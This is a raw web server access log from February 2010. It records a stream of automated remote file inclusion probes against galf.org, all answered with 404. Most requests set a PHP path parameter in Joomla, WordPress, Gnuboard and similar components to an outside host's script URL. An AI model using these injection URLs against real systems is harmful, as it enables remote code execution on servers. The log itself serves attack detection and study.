217.70.129.162 - - [01/Feb/2010:03:22:06 -0800] "GET /logs/access_091214.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://jal1.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.119.203.89 - - [01/Feb/2010:03:22:50 -0800] "GET /logs/access_091116.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.119.203.89 - - [01/Feb/2010:03:22:50 -0800] "GET /logs/access_091123.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.119.203.89 - - [01/Feb/2010:03:23:01 -0800] "GET /logs/access_091116.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.119.203.89 - - [01/Feb/2010:03:23:01 -0800] "GET /logs/access_091123.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.119.203.89 - - [01/Feb/2010:03:23:05 -0800] "GET /logs/access_091116.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.119.203.89 - - [01/Feb/2010:03:23:05 -0800] "GET /logs/access_091123.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.70.129.162 - - [01/Feb/2010:03:23:31 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://jal1.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.70.129.162 - - [01/Feb/2010:03:23:31 -0800] "GET /logs/access_091214.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://jal1.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.70.129.162 - - [01/Feb/2010:03:23:31 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://jal1.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.70.129.162 - - [01/Feb/2010:03:23:31 -0800] "GET /logs/access_091019.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://jal1.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:23:58 -0800] "GET /logs/access_090831.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:24:24 -0800] "GET /logs/access_090720.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:26:11 -0800] "GET //board/bbs/write_update.php//bbs//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:26:11 -0800] "GET /logs///board/bbs/write_update.php//bbs//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:26:14 -0800] "GET //board/bbs/write_update.php//bbs//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:26:14 -0800] "GET /logs///board/bbs/write_update.php//bbs//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:26:18 -0800] "GET /logs///board/bbs/write_update.php//bbs//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:26:18 -0800] "GET //board/bbs/write_update.php//bbs//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:26:38 -0800] "GET /logs/access.log%20%20///board/bbs/write_update.php//bbs//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:26:42 -0800] "GET /logs/access.log%20%20///board/bbs/write_update.php//bbs//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:26:46 -0800] "GET /logs/access.log%20%20///board/bbs/write_update.php//bbs//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [01/Feb/2010:03:27:35 -0800] "GET /logs/access_090817.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [01/Feb/2010:03:28:16 -0800] "GET /snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [01/Feb/2010:03:28:16 -0800] "GET /logs/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [01/Feb/2010:03:28:16 -0800] "GET /logs/access_091012.log%20%20/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:28:27 -0800] "GET /logs/access_100125.log%20%20///board/bbs/write_update.php//bbs//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.138.32.230 - - [01/Feb/2010:03:28:32 -0800] "GET /logs/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.138.32.230 - - [01/Feb/2010:03:28:32 -0800] "GET /snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.138.32.230 - - [01/Feb/2010:03:28:32 -0800] "GET /logs/access_091012.log%20%20/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:28:33 -0800] "GET /logs/access_100125.log%20%20///board/bbs/write_update.php//bbs//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.138.32.230 - - [01/Feb/2010:03:28:52 -0800] "GET /logs/access_090914.log%20%20/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [01/Feb/2010:03:28:53 -0800] "GET /logs/access_090914.log%20%20/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:29:07 -0800] "GET /logs/access_100125.log%20%20///board/bbs/write_update.php//bbs//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [01/Feb/2010:03:29:10 -0800] "GET /logs/access_090817.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [01/Feb/2010:03:29:15 -0800] "GET /logs/access_090817.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.169.159.227 - - [01/Feb/2010:03:29:50 -0800] "GET /common/db.php?commonpath=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.169.159.227 - - [01/Feb/2010:03:29:50 -0800] "GET /common/db.php?commonpath=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.169.159.227 - - [01/Feb/2010:03:29:50 -0800] "GET /logs//common/db.php?commonpath=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.169.159.227 - - [01/Feb/2010:03:29:50 -0800] "GET /logs//common/db.php?commonpath=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.169.159.227 - - [01/Feb/2010:03:29:51 -0800] "GET /logs/access.log//common/db.php?commonpath=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.169.159.227 - - [01/Feb/2010:03:29:51 -0800] "GET /logs/access.log//common/db.php?commonpath=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.16.230.82 - - [01/Feb/2010:03:30:43 -0800] "GET /logs////gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [01/Feb/2010:03:30:43 -0800] "GET /logs/access.log////gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [01/Feb/2010:03:30:43 -0800] "GET ///gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.193.131.164 - - [01/Feb/2010:03:33:53 -0800] "GET /logs//spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.193.131.164 - - [01/Feb/2010:03:33:53 -0800] "GET /logs/access_090720.log//spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.193.131.164 - - [01/Feb/2010:03:33:53 -0800] "GET /spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.193.131.164 - - [01/Feb/2010:03:34:14 -0800] "GET /logs/access_090720.log//spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.193.131.164 - - [01/Feb/2010:03:34:14 -0800] "GET /logs//spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.193.131.164 - - [01/Feb/2010:03:34:14 -0800] "GET /spaw_control.class.php?spaw_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:03:34:34 -0800] "GET /logs/errors.php?error=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:03:34:34 -0800] "GET /logs/access.log/errors.php?error=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:03:34:34 -0800] "GET /errors.php?error=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:03:34:35 -0800] "GET /logs/access.log/errors.php?error=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:03:34:35 -0800] "GET /errors.php?error=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:03:34:35 -0800] "GET /logs/errors.php?error=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [01/Feb/2010:03:35:16 -0800] "GET /write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [01/Feb/2010:03:35:16 -0800] "GET /logs/access_090803.log//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [01/Feb/2010:03:35:16 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:36:18 -0800] "GET /AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:36:18 -0800] "GET /logs//AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:36:18 -0800] "GET /logs/access_090803.log%20%20//AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.138.32.230 - - [01/Feb/2010:03:37:30 -0800] "GET /logs/access_090810.log/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.138.32.230 - - [01/Feb/2010:03:37:30 -0800] "GET /logs/access_091012.log/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [01/Feb/2010:03:38:52 -0800] "GET /logs/access_090803.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.221.91.55 - - [01/Feb/2010:03:38:57 -0800] "GET /logs/access_090810.log/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.221.91.55 - - [01/Feb/2010:03:38:57 -0800] "GET /logs/access_091012.log/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.221.91.55 - - [01/Feb/2010:03:38:57 -0800] "GET /snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.221.91.55 - - [01/Feb/2010:03:38:57 -0800] "GET /logs/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:39:41 -0800] "GET /logs/access_091102.log%20%20//SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:39:41 -0800] "GET /SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:39:41 -0800] "GET /logs//SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:39:41 -0800] "GET /logs/access_091102.log%20%20//SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:39:41 -0800] "GET /SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:39:41 -0800] "GET /logs//SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:39:42 -0800] "GET /logs/access_091102.log//SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:39:42 -0800] "GET /SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:39:42 -0800] "GET /logs//SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:39:42 -0800] "GET /logs/access_091102.log//SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:39:42 -0800] "GET /SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:39:42 -0800] "GET /logs//SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:39:43 -0800] "GET /logs/access_091102.log//SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:39:43 -0800] "GET /logs//SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:39:43 -0800] "GET /SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:39:44 -0800] "GET /logs/access_091102.log//SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:39:44 -0800] "GET /SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:39:44 -0800] "GET /logs//SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.203.198 - - [01/Feb/2010:03:39:54 -0800] "GET /index.php?pagina=http://b2751661.justfree.com/lo.txt? HTTP/1.1" 404 - "-" "Microsoft Pocket Internet Explorer/0.6" "www.galf.org"
85.17.203.198 - - [01/Feb/2010:03:39:54 -0800] "GET /logs/index.php?pagina=http://b2751661.justfree.com/lo.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:40:08 -0800] "GET /logs/access.log//SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:40:08 -0800] "GET /logs//SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:40:08 -0800] "GET /SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:40:11 -0800] "GET /logs/access.log//SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:40:11 -0800] "GET /SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:40:11 -0800] "GET /logs//SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:40:15 -0800] "GET /SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:40:15 -0800] "GET /logs//SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:40:15 -0800] "GET /logs/access_091102.log//SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:40:15 -0800] "GET /logs/access_091102.log//SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:40:15 -0800] "GET /SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:40:15 -0800] "GET /logs//SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:40:16 -0800] "GET /logs/access.log//SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.26.199.126 - - [01/Feb/2010:03:40:18 -0800] "GET /logs/access.log//SSI.php?sourcedir=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.138.32.230 - - [01/Feb/2010:03:40:35 -0800] "GET /logs/access_090803.log/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.193.131.164 - - [01/Feb/2010:03:41:28 -0800] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:03:41:30 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.193.131.164 - - [01/Feb/2010:03:41:30 -0800] "GET /logs///components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.193.131.164 - - [01/Feb/2010:03:41:30 -0800] "GET /logs/access_091221.log///components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [01/Feb/2010:03:41:45 -0800] "GET /logs/access_090803.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:03:42:00 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [01/Feb/2010:03:42:05 -0800] "GET /logs/access_090803.log/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Feb/2010:03:44:18 -0800] "GET /logs/access.log//components/errors.php?error=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.19.79.209 - - [01/Feb/2010:03:44:37 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "StackRambler/2.0 (MSIE incompatible)" "www.galf.org"
94.124.120.47 - - [01/Feb/2010:03:44:46 -0800] "GET /index.php?page=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
94.124.120.47 - - [01/Feb/2010:03:44:47 -0800] "GET /index.php?page=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
66.221.91.55 - - [01/Feb/2010:03:46:43 -0800] "GET /logs/access_090803.log/snippet.reflect.php?reflect_base=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:47:41 -0800] "GET //ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:47:41 -0800] "GET /logs///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:47:41 -0800] "GET /logs///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:47:41 -0800] "GET /logs/access_100118.log%20%20///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:47:41 -0800] "GET /logs/access_100118.log%20%20///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:47:41 -0800] "GET //ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:47:41 -0800] "GET //ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:47:41 -0800] "GET /logs/access_100118.log%20%20///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:47:41 -0800] "GET /logs///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
